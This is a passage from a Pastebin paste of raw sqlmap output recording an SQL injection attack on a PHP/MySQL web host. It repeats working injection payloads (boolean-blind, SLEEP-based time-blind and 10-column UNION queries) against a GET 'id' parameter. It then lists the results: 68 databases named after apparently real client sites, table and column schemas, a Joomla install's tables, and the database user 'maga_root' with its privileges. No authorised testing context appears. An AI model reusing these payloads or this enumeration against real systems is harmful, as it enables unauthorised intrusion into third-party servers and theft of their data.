  786. Payload: id=-7609 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171767871,0x55465a6d4c427666656d,0x71787a7671),NULL,NULL,NULL,NULL,NULL--
  787. ---
  788. web application technology: PHP 5.3.20, Apache 2.2.23
  789. back-end DBMS: MySQL 5.0.12
  790. Database: maga_fb
  791. Table: usuario
  792. [0 entries]
  793. +------------+-----------------+-------+-------+-------+-----------+-----------+--------------+--------------+---------------+
  794. | usuario_id | departamento_id | senha | ativo | email | descricao | nome_real | nivel_acesso | nome_usuario | data_cadastro |
  795. +------------+-----------------+-------+-------+-------+-----------+-----------+--------------+--------------+---------------+
  796. +------------+-----------------+-------+-------+-------+-----------+-----------+--------------+--------------+---------------+
  797.  
  798. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  799. ---
  800. Parameter: id (GET)
  801. Type: boolean-based blind
  802. Title: AND boolean-based blind - WHERE or HAVING clause
  803. Payload: id=24 AND 2456=2456
  804.  
  805. Type: AND/OR time-based blind
  806. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  807. Payload: id=24 AND (SELECT * FROM (SELECT(SLEEP(5)))qQGx)
  808.  
  809. Type: UNION query
  810. Title: Generic UNION query (NULL) - 10 columns
  811. Payload: id=-7609 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171767871,0x55465a6d4c427666656d,0x71787a7671),NULL,NULL,NULL,NULL,NULL--
  812. ---
  813. web application technology: PHP 5.3.20, Apache 2.2.23
  814. back-end DBMS: MySQL 5.0.12
  815. available databases [68]:
  816. [*] information_schema
  817. [*] maga_adm
  818. [*] maga_agenda
  819. [*] maga_anael
  820. [*] maga_arq
  821. [*] maga_bene2
  822. [*] maga_bene3
  823. [*] maga_bene4
  824. [*] maga_bene5
  825. [*] maga_bene6
  826. [*] maga_cariocando
  827. [*] maga_corvete
  828. [*] maga_dekuhl
  829. [*] maga_dfitness2
  830. [*] maga_difibras
  831. [*] maga_difitness3
  832. [*] maga_doris
  833. [*] maga_edson
  834. [*] maga_fb
  835. [*] maga_fisiofisico
  836. [*] maga_fitlav
  837. [*] maga_flordamontanha
  838. [*] maga_imm
  839. [*] maga_imoveisweb
  840. [*] maga_info1000
  841. [*] maga_jardimintranet
  842. [*] maga_jardimpraiabeiramar
  843. [*] maga_jornalOxigenio
  844. [*] maga_jupa
  845. [*] maga_lock
  846. [*] maga_luizmanninovo
  847. [*] maga_magento
  848. [*] maga_mde
  849. [*] maga_mdenovosite
  850. [*] maga_mwproject
  851. [*] maga_naturana
  852. [*] maga_netpubli
  853. [*] maga_netrocinha
  854. [*] maga_news
  855. [*] maga_nooccontrole
  856. [*] maga_oficinadafolha
  857. [*] maga_phpcollab
  858. [*] maga_pinheiro
  859. [*] maga_pomoli
  860. [*] maga_recantonatural3
  861. [*] maga_revistateste
  862. [*] maga_ricardo
  863. [*] maga_riolazermoveis
  864. [*] maga_santarosa
  865. [*] maga_sisescola
  866. [*] maga_soc
  867. [*] maga_socagenda
  868. [*] maga_somimagem
  869. [*] maga_sr
  870. [*] maga_supercali
  871. [*] maga_tap
  872. [*] maga_testeggears
  873. [*] maga_unixpat
  874. [*] maga_urcasonica
  875. [*] maga_vygo
  876. [*] maga_vygomwproject
  877. [*] maga_webcalen
  878. [*] maga_webcalendar
  879. [*] maga_webftp
  880. [*] maga_wordpress
  881. [*] maga_yogaculture
  882. [*] maga_zog
  883. [*] maga_zoo
  884.  
  885. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  886. ---
  887. Parameter: id (GET)
  888. Type: boolean-based blind
  889. Title: AND boolean-based blind - WHERE or HAVING clause
  890. Payload: id=24 AND 2456=2456
  891.  
  892. Type: AND/OR time-based blind
  893. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  894. Payload: id=24 AND (SELECT * FROM (SELECT(SLEEP(5)))qQGx)
  895.  
  896. Type: UNION query
  897. Title: Generic UNION query (NULL) - 10 columns
  898. Payload: id=-7609 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171767871,0x55465a6d4c427666656d,0x71787a7671),NULL,NULL,NULL,NULL,NULL--
  899. ---
  900. web application technology: PHP 5.3.20, Apache 2.2.23
  901. back-end DBMS: MySQL 5.0.12
  902. Database: maga_anael
  903. [1 table]
  904. +----------+
  905. | produtos |
  906. +----------+
  907.  
  908. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  909. ---
  910. Parameter: id (GET)
  911. Type: boolean-based blind
  912. Title: AND boolean-based blind - WHERE or HAVING clause
  913. Payload: id=24 AND 2456=2456
  914.  
  915. Type: AND/OR time-based blind
  916. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  917. Payload: id=24 AND (SELECT * FROM (SELECT(SLEEP(5)))qQGx)
  918.  
  919. Type: UNION query
  920. Title: Generic UNION query (NULL) - 10 columns
  921. Payload: id=-7609 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171767871,0x55465a6d4c427666656d,0x71787a7671),NULL,NULL,NULL,NULL,NULL--
  922. ---
  923. web application technology: PHP 5.3.20, Apache 2.2.23
  924. back-end DBMS: MySQL 5.0.12
  925. Database: maga_netpubli
  926. [51 tables]
  927. +----------------------------+
  928. | UJ |
  929. | acfs |
  930. | anael |
  931. | avox |
  932. | brasil2014 |
  933. | casa |
  934. | casa_do_consumidor |
  935. | ccarj |
  936. | ccarj2 |
  937. | ccarj_bkp23062006 |
  938. | ceudomar |
  939. | ceudomar2 |
  940. | comesebebes |
  941. | conteudo |
  942. | daimecd |
  943. | dekuhl |
  944. | dekuhl22072006 |
  945. | elzatangos |
  946. | esplanadaGrill |
  947. | fb |
  948. | felipeRodrigues |
  949. | gandraconsultoria |
  950. | guilherme |
  951. | guilhermeparanhos_ |
  952. | guto |
  953. | gutogoulart |
  954. | info1000 |
  955. | interwhost |
  956. | jornaloxigenio_anunciantes |
  957. | luizmanni |
  958. | luizmanni2 |
  959. | luizmanni_ingles |
  960. | maga_naturana |
  961. | magaweb |
  962. | magaweb_site2 |
  963. | martista |
  964. | miragavea |
  965. | momentosdereflexao |
  966. | motorio |
  967. | nni |
  968. | novo |
  969. | obracompleta |
  970. | oxigenio2 |
  971. | ricardo |
  972. | saccobed |
  973. | santaRosa |
  974. | talitta |
  975. | tefl |
  976. | template |
  977. | urca2 |
  978. | urcasonica |
  979. +----------------------------+
  980.  
  981. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  982. ---
  983. Parameter: id (GET)
  984. Type: boolean-based blind
  985. Title: AND boolean-based blind - WHERE or HAVING clause
  986. Payload: id=24 AND 2456=2456
  987.  
  988. Type: AND/OR time-based blind
  989. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  990. Payload: id=24 AND (SELECT * FROM (SELECT(SLEEP(5)))qQGx)
  991.  
  992. Type: UNION query
  993. Title: Generic UNION query (NULL) - 10 columns
  994. Payload: id=-7609 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171767871,0x55465a6d4c427666656d,0x71787a7671),NULL,NULL,NULL,NULL,NULL--
  995. ---
  996. web application technology: PHP 5.3.20, Apache 2.2.23
  997. back-end DBMS: MySQL 5.0.12
  998. Database: maga_netpubli
  999. Table: magaweb
  1000. [8 columns]
  1001. +--------------+--------------+
  1002. | Column | Type |
  1003. +--------------+--------------+
  1004. | background | varchar(200) |
  1005. | bgcolor | varchar(100) |
  1006. | id | smallint(6) |
  1007. | link | varchar(220) |
  1008. | texto | text |
  1009. | titulo | varchar(200) |
  1010. | vinculo | varchar(200) |
  1011. | visualizacao | smallint(6) |
  1012. +--------------+--------------+
  1013.  
  1014. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  1015. ---
  1016. Parameter: id (GET)
  1017. Type: boolean-based blind
  1018. Title: AND boolean-based blind - WHERE or HAVING clause
  1019. Payload: id=24 AND 2456=2456
  1020.  
  1021. Type: AND/OR time-based blind
  1022. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  1023. Payload: id=24 AND (SELECT * FROM (SELECT(SLEEP(5)))qQGx)
  1024.  
  1025. Type: UNION query
  1026. Title: Generic UNION query (NULL) - 10 columns
  1027. Payload: id=-7609 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171767871,0x55465a6d4c427666656d,0x71787a7671),NULL,NULL,NULL,NULL,NULL--
  1028. ---
  1029. web application technology: PHP 5.3.20, Apache 2.2.23
  1030. back-end DBMS: MySQL 5.0.12
  1031. Database: maga_netpubli
  1032. Table: interwhost
  1033. [12 columns]
  1034. +--------------+---------------+
  1035. | Column | Type |
  1036. +--------------+---------------+
  1037. | background | varchar(150) |
  1038. | bgcolor | varchar(100) |
  1039. | data | datetime |
  1040. | descricao | text |
  1041. | id | smallint(6) |
  1042. | keywords | text |
  1043. | link | varchar(220) |
  1044. | posicao | smallint(6) |
  1045. | texto | text |
  1046. | titulo | varchar(200) |
  1047. | vinculo | smallint(200) |
  1048. | visualizacao | smallint(6) |
  1049. +--------------+---------------+
  1050.  
  1051. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  1052. ---
  1053. Parameter: id (GET)
  1054. Type: boolean-based blind
  1055. Title: AND boolean-based blind - WHERE or HAVING clause
  1056. Payload: id=24 AND 2456=2456
  1057.  
  1058. Type: AND/OR time-based blind
  1059. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  1060. Payload: id=24 AND (SELECT * FROM (SELECT(SLEEP(5)))qQGx)
  1061.  
  1062. Type: UNION query
  1063. Title: Generic UNION query (NULL) - 10 columns
  1064. Payload: id=-7609 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171767871,0x55465a6d4c427666656d,0x71787a7671),NULL,NULL,NULL,NULL,NULL--
  1065. ---
  1066. web application technology: PHP 5.3.20, Apache 2.2.23
  1067. back-end DBMS: MySQL 5.0.12
  1068. available databases [68]:
  1069. [*] information_schema
  1070. [*] maga_adm
  1071. [*] maga_agenda
  1072. [*] maga_anael
  1073. [*] maga_arq
  1074. [*] maga_bene2
  1075. [*] maga_bene3
  1076. [*] maga_bene4
  1077. [*] maga_bene5
  1078. [*] maga_bene6
  1079. [*] maga_cariocando
  1080. [*] maga_corvete
  1081. [*] maga_dekuhl
  1082. [*] maga_dfitness2
  1083. [*] maga_difibras
  1084. [*] maga_difitness3
  1085. [*] maga_doris
  1086. [*] maga_edson
  1087. [*] maga_fb
  1088. [*] maga_fisiofisico
  1089. [*] maga_fitlav
  1090. [*] maga_flordamontanha
  1091. [*] maga_imm
  1092. [*] maga_imoveisweb
  1093. [*] maga_info1000
  1094. [*] maga_jardimintranet
  1095. [*] maga_jardimpraiabeiramar
  1096. [*] maga_jornalOxigenio
  1097. [*] maga_jupa
  1098. [*] maga_lock
  1099. [*] maga_luizmanninovo
  1100. [*] maga_magento
  1101. [*] maga_mde
  1102. [*] maga_mdenovosite
  1103. [*] maga_mwproject
  1104. [*] maga_naturana
  1105. [*] maga_netpubli
  1106. [*] maga_netrocinha
  1107. [*] maga_news
  1108. [*] maga_nooccontrole
  1109. [*] maga_oficinadafolha
  1110. [*] maga_phpcollab
  1111. [*] maga_pinheiro
  1112. [*] maga_pomoli
  1113. [*] maga_recantonatural3
  1114. [*] maga_revistateste
  1115. [*] maga_ricardo
  1116. [*] maga_riolazermoveis
  1117. [*] maga_santarosa
  1118. [*] maga_sisescola
  1119. [*] maga_soc
  1120. [*] maga_socagenda
  1121. [*] maga_somimagem
  1122. [*] maga_sr
  1123. [*] maga_supercali
  1124. [*] maga_tap
  1125. [*] maga_testeggears
  1126. [*] maga_unixpat
  1127. [*] maga_urcasonica
  1128. [*] maga_vygo
  1129. [*] maga_vygomwproject
  1130. [*] maga_webcalen
  1131. [*] maga_webcalendar
  1132. [*] maga_webftp
  1133. [*] maga_wordpress
  1134. [*] maga_yogaculture
  1135. [*] maga_zog
  1136. [*] maga_zoo
  1137.  
  1138. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  1139. ---
  1140. Parameter: id (GET)
  1141. Type: boolean-based blind
  1142. Title: AND boolean-based blind - WHERE or HAVING clause
  1143. Payload: id=24 AND 2456=2456
  1144.  
  1145. Type: AND/OR time-based blind
  1146. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  1147. Payload: id=24 AND (SELECT * FROM (SELECT(SLEEP(5)))qQGx)
  1148.  
  1149. Type: UNION query
  1150. Title: Generic UNION query (NULL) - 10 columns
  1151. Payload: id=-7609 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171767871,0x55465a6d4c427666656d,0x71787a7671),NULL,NULL,NULL,NULL,NULL--
  1152. ---
  1153. web application technology: PHP 5.3.20, Apache 2.2.23
  1154. back-end DBMS: MySQL 5.0.12
  1155. Database: maga_unixpat
  1156. [37 tables]
  1157. +-----------------------------+
  1158. | jos_banner |
  1159. | jos_bannerclient |
  1160. | jos_bannertrack |
  1161. | jos_categories |
  1162. | jos_components |
  1163. | jos_contact_details |
  1164. | jos_content |
  1165. | jos_content_frontpage |
  1166. | jos_content_rating |
  1167. | jos_core_acl_aro |
  1168. | jos_core_acl_aro_groups |
  1169. | jos_core_acl_aro_map |
  1170. | jos_core_acl_aro_sections |
  1171. | jos_core_acl_groups_aro_map |
  1172. | jos_core_log_items |
  1173. | jos_core_log_searches |
  1174. | jos_groups |
  1175. | jos_menu |
  1176. | jos_menu_types |
  1177. | jos_messages |
  1178. | jos_messages_cfg |
  1179. | jos_migration_backlinks |
  1180. | jos_modules |
  1181. | jos_modules_menu |
  1182. | jos_newsfeeds |
  1183. | jos_plugins |
  1184. | jos_poll_data |
  1185. | jos_poll_date |
  1186. | jos_poll_menu |
  1187. | jos_polls |
  1188. | jos_rokcandy |
  1189. | jos_sections |
  1190. | jos_session |
  1191. | jos_stats_agents |
  1192. | jos_templates_menu |
  1193. | jos_users |
  1194. | jos_weblinks |
  1195. +-----------------------------+
  1196.  
  1197. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  1198. ---
  1199. Parameter: id (GET)
  1200. Type: boolean-based blind
  1201. Title: AND boolean-based blind - WHERE or HAVING clause
  1202. Payload: id=24 AND 2456=2456
  1203.  
  1204. Type: AND/OR time-based blind
  1205. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  1206. Payload: id=24 AND (SELECT * FROM (SELECT(SLEEP(5)))qQGx)
  1207.  
  1208. Type: UNION query
  1209. Title: Generic UNION query (NULL) - 10 columns
  1210. Payload: id=-7609 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171767871,0x55465a6d4c427666656d,0x71787a7671),NULL,NULL,NULL,NULL,NULL--
  1211. ---
  1212. web application technology: PHP 5.3.20, Apache 2.2.23
  1213. back-end DBMS: MySQL 5.0.12
  1214. Database: maga_unixpat
  1215. Table: jos_weblinks
  1216. [16 columns]
  1217. +------------------+------------------+
  1218. | Column | Type |
  1219. +------------------+------------------+
  1220. | date | datetime |
  1221. | alias | varchar(255) |
  1222. | approved | tinyint(1) |
  1223. | archived | tinyint(1) |
  1224. | catid | int(11) |
  1225. | checked_out | int(11) |
  1226. | checked_out_time | datetime |
  1227. | description | text |
  1228. | hits | int(11) |
  1229. | id | int(11) unsigned |
  1230. | ordering | int(11) |
  1231. | params | text |
  1232. | published | tinyint(1) |
  1233. | sid | int(11) |
  1234. | title | varchar(250) |
  1235. | url | varchar(250) |
  1236. +------------------+------------------+
  1237.  
  1238. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  1239. ---
  1240. Parameter: id (GET)
  1241. Type: boolean-based blind
  1242. Title: AND boolean-based blind - WHERE or HAVING clause
  1243. Payload: id=24 AND 2456=2456
  1244.  
  1245. Type: AND/OR time-based blind
  1246. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  1247. Payload: id=24 AND (SELECT * FROM (SELECT(SLEEP(5)))qQGx)
  1248.  
  1249. Type: UNION query
  1250. Title: Generic UNION query (NULL) - 10 columns
  1251. Payload: id=-7609 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171767871,0x55465a6d4c427666656d,0x71787a7671),NULL,NULL,NULL,NULL,NULL--
  1252. ---
  1253. web application technology: PHP 5.3.20, Apache 2.2.23
  1254. back-end DBMS: MySQL 5.0.12
  1255. Database: maga_unixpat
  1256. Table: jos_weblinks
  1257. [6 entries]
  1258. +----------------------------------+
  1259. | url |
  1260. +----------------------------------+
  1261. | http://forum.joomla.org |
  1262. | http://www.joomla.org |
  1263. | http://www.mysql.com |
  1264. | http://www.ohloh.net/projects/20 |
  1265. | http://www.opensourcematters.org |
  1266. | http://www.php.net |
  1267. +----------------------------------+
  1268.  
  1269. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  1270. ---
  1271. Parameter: id (GET)
  1272. Type: boolean-based blind
  1273. Title: AND boolean-based blind - WHERE or HAVING clause
  1274. Payload: id=24 AND 2456=2456
  1275.  
  1276. Type: AND/OR time-based blind
  1277. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  1278. Payload: id=24 AND (SELECT * FROM (SELECT(SLEEP(5)))qQGx)
  1279.  
  1280. Type: UNION query
  1281. Title: Generic UNION query (NULL) - 10 columns
  1282. Payload: id=-7609 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171767871,0x55465a6d4c427666656d,0x71787a7671),NULL,NULL,NULL,NULL,NULL--
  1283. ---
  1284. web application technology: PHP 5.3.20, Apache 2.2.23
  1285. back-end DBMS: MySQL 5.0.12
  1286. database management system users [1]:
  1287. [*] 'maga_root'@'localhost'
  1288.  
  1289. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  1290. ---
  1291. Parameter: id (GET)
  1292. Type: boolean-based blind
  1293. Title: AND boolean-based blind - WHERE or HAVING clause
  1294. Payload: id=24 AND 2456=2456
  1295.  
  1296. Type: AND/OR time-based blind
  1297. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  1298. Payload: id=24 AND (SELECT * FROM (SELECT(SLEEP(5)))qQGx)
  1299.  
  1300. Type: UNION query
  1301. Title: Generic UNION query (NULL) - 10 columns
  1302. Payload: id=-7609 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171767871,0x55465a6d4c427666656d,0x71787a7671),NULL,NULL,NULL,NULL,NULL--
  1303. ---
  1304. web application technology: PHP 5.3.20, Apache 2.2.23
  1305. back-end DBMS: MySQL 5.0.12
  1306. banner: '5.1.73-cll'
  1307. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  1308. ---
  1309. Parameter: id (GET)
  1310. Type: boolean-based blind
  1311. Title: AND boolean-based blind - WHERE or HAVING clause
  1312. Payload: id=24 AND 2456=2456
  1313.  
  1314. Type: AND/OR time-based blind
  1315. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  1316. Payload: id=24 AND (SELECT * FROM (SELECT(SLEEP(5)))qQGx)
  1317.  
  1318. Type: UNION query
  1319. Title: Generic UNION query (NULL) - 10 columns
  1320. Payload: id=-7609 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171767871,0x55465a6d4c427666656d,0x71787a7671),NULL,NULL,NULL,NULL,NULL--
  1321. ---
  1322. web application technology: PHP 5.3.20, Apache 2.2.23
  1323. back-end DBMS: MySQL 5.0.12
  1324. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  1325. ---
  1326. Parameter: id (GET)
  1327. Type: boolean-based blind
  1328. Title: AND boolean-based blind - WHERE or HAVING clause
  1329. Payload: id=24 AND 2456=2456
  1330.  
  1331. Type: AND/OR time-based blind
  1332. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  1333. Payload: id=24 AND (SELECT * FROM (SELECT(SLEEP(5)))qQGx)
  1334.  
  1335. Type: UNION query
  1336. Title: Generic UNION query (NULL) - 10 columns
  1337. Payload: id=-7609 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171767871,0x55465a6d4c427666656d,0x71787a7671),NULL,NULL,NULL,NULL,NULL--
  1338. ---
  1339. web application technology: PHP 5.3.20, Apache 2.2.23
  1340. back-end DBMS: MySQL 5.0.12
  1341. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  1342. ---
  1343. Parameter: id (GET)
  1344. Type: boolean-based blind
  1345. Title: AND boolean-based blind - WHERE or HAVING clause
  1346. Payload: id=24 AND 2456=2456
  1347.  
  1348. Type: AND/OR time-based blind
  1349. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  1350. Payload: id=24 AND (SELECT * FROM (SELECT(SLEEP(5)))qQGx)
  1351.  
  1352. Type: UNION query
  1353. Title: Generic UNION query (NULL) - 10 columns
  1354. Payload: id=-7609 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171767871,0x55465a6d4c427666656d,0x71787a7671),NULL,NULL,NULL,NULL,NULL--
  1355. ---
  1356. web application technology: PHP 5.3.20, Apache 2.2.23
  1357. back-end DBMS: MySQL 5.0.12
  1358. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  1359. ---
  1360. Parameter: id (GET)
  1361. Type: boolean-based blind
  1362. Title: AND boolean-based blind - WHERE or HAVING clause
  1363. Payload: id=24 AND 2456=2456
  1364.  
  1365. Type: AND/OR time-based blind
  1366. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  1367. Payload: id=24 AND (SELECT * FROM (SELECT(SLEEP(5)))qQGx)
  1368.  
  1369. Type: UNION query
  1370. Title: Generic UNION query (NULL) - 10 columns
  1371. Payload: id=-7609 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171767871,0x55465a6d4c427666656d,0x71787a7671),NULL,NULL,NULL,NULL,NULL--
  1372. ---
  1373. web application technology: PHP 5.3.20, Apache 2.2.23
  1374. back-end DBMS: MySQL 5.0.12
  1375. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  1376. ---
  1377. Parameter: id (GET)
  1378. Type: boolean-based blind
  1379. Title: AND boolean-based blind - WHERE or HAVING clause
  1380. Payload: id=24 AND 2456=2456
  1381.  
  1382. Type: AND/OR time-based blind
  1383. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  1384. Payload: id=24 AND (SELECT * FROM (SELECT(SLEEP(5)))qQGx)
  1385.  
  1386. Type: UNION query
  1387. Title: Generic UNION query (NULL) - 10 columns
  1388. Payload: id=-7609 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171767871,0x55465a6d4c427666656d,0x71787a7671),NULL,NULL,NULL,NULL,NULL--
  1389. ---
  1390. web application technology: PHP 5.3.20, Apache 2.2.23
  1391. back-end DBMS: MySQL 5.0.12
  1392. database management system users privileges:
  1393. [*] 'maga_root'@'localhost' [1]:
  1394. privilege: USAGE
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!